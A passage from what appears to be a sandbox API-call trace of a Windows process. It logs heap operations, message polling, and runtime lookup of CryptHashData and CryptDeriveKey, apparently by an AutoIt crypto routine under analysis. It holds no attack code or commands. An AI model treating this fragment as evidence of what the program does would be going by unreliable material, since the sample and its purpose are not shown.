hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0268.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0268.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0268.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0268.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0268.410] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0268.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0268.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0268.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0268.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0268.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0268.410] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0268.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0268.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0268.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51aa8 [0268.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0268.410] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0268.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0268.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0268.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0268.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0268.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0268.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0268.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0268.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0268.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0268.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0268.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0268.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0268.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0268.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0268.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0268.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0268.411] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0268.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51dd8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0268.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0268.412] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0268.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0268.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0268.412] CryptHashData (hHash=0xa87610, pbData=0x2e54f48, dwDataLen=0x3, dwFlags=0x1) returned 1 [0268.412] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.412] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0268.412] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.412] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0268.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0268.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551e8 | out: hHeap=0x970000) returned 1 [0268.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51d60 [0268.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0268.413] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0268.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55288 [0268.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55278 [0268.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0268.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55288 | out: hHeap=0x970000) returned 1 [0268.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0268.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0268.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55118 | out: hHeap=0x970000) returned 1 [0268.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0268.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55138 [0268.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0268.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0268.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0268.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55268 [0268.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0268.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0268.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0268.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551c8 [0268.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0268.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0268.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0268.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0268.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0268.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55148 [0268.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0268.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552f8 [0268.417] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0268.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0268.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552f8 | out: hHeap=0x970000) returned 1 [0268.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51da8 [0268.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0268.417] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0268.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551c8 [0268.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551b8 [0268.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551b8 | out: hHeap=0x970000) returned 1 [0268.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0268.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0268.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0268.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55148 | out: hHeap=0x970000) returned 1 [0268.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0268.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55158 [0268.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0268.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0268.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0268.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552d8 [0268.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552d8 | out: hHeap=0x970000) returned 1 [0268.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0268.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55248 [0268.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0268.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0268.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0268.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0268.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0268.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55258 [0268.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55258 | out: hHeap=0x970000) returned 1 [0268.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0268.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552c8 [0268.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0268.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552c8 | out: hHeap=0x970000) returned 1 [0268.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0268.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55238 [0268.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55238 | out: hHeap=0x970000) returned 1 [0268.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0268.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551f8 [0268.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0268.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0268.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0268.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55218 [0268.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55218 | out: hHeap=0x970000) returned 1 [0268.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55228 [0268.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0268.419] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0268.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55188 [0268.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55238 [0268.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0268.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0268.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0268.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0268.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55238 | out: hHeap=0x970000) returned 1 [0268.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0268.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55238 [0268.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0268.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55268 [0268.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552f8 [0268.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0268.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0268.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0268.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0268.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552f8 | out: hHeap=0x970000) returned 1 [0268.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55218 [0268.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0268.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55168 [0268.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552e8 [0268.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0268.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0268.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55168 | out: hHeap=0x970000) returned 1 [0268.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0268.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552e8 | out: hHeap=0x970000) returned 1 [0268.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551a8 [0268.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0268.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552e8 [0268.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55248 [0268.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0268.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0268.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552e8 | out: hHeap=0x970000) returned 1 [0268.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0268.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0268.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55178 [0268.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0268.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552a8 [0268.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552c8 [0268.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0268.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0268.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0268.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0268.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552c8 | out: hHeap=0x970000) returned 1 [0268.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0268.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0268.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55308 [0268.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0268.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55158 [0268.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55168 [0268.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0268.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0268.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0268.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0268.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55168 | out: hHeap=0x970000) returned 1 [0268.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0268.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55138 [0268.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0268.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51ca0 [0268.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51ca0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0268.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0268.421] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0268.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0268.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0268.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0268.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55268 [0268.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55158 [0268.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55248 [0268.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55288 [0268.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0268.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0268.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0268.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0268.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55288 | out: hHeap=0x970000) returned 1 [0268.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0268.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0268.422] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87610, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87510) returned 1 [0268.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14f50 [0268.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0268.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0268.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0268.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0268.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0268.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552a8 [0268.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0268.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0268.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0268.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0268.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0268.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0268.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55188 [0268.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0268.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0268.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0268.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0268.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0268.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0268.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55158 [0268.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0268.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0268.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0268.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0268.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0268.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52120 [0268.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55168 [0268.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52120 | out: hHeap=0x970000) returned 1 [0268.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55168 | out: hHeap=0x970000) returned 1 [0268.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0268.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0268.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f10 [0268.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52138 [0268.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551b8 [0268.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52138 | out: hHeap=0x970000) returned 1 [0268.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551b8 | out: hHeap=0x970000) returned 1 [0268.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f10 | out: hHeap=0x970000) returned 1 [0268.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f58 [0268.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 